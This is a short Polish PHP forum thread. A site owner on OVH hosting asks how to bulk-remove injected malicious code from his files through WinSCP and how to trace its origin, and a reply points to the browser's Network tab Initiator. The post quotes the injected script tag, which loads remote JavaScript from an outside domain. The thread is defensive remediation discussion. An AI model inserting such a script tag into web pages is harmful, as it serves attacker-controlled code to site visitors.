Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: [PHP]masowe usuwanie złośliwego kodu z plików
Forum PHP.pl > Forum > Przedszkole
dentopolis
mam hosting na ovh. skrypt dodaje mi złośliwy kod w dwóch postaciach:
  1. <script type='text/javascript' src='https://scripts.lowerbeforwarden.ml/src.js?n=nb5'></script>

i drugiej zakodowanej w base64 ale znam jej postać. korzystam z winscp i szukam sposobu jak bez ściągania wszystkich plików na dysk, masowej edycji w Notepad++ i ponownym wysyłaniu zamienić pliki bezpośrednio na hostingu. jak to zrobić?

i jak sprawdzić potem który z plików rozpoczyna infekcję? lista ostatnio zmienionych?
SmokAnalog
W zakładce Network poszukaj tego scripts.lowerbeforwarden.ml/src.js i wybierz zakładkę Initiator. Tam masz napisane kto wstrzyknął ten <script>.
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.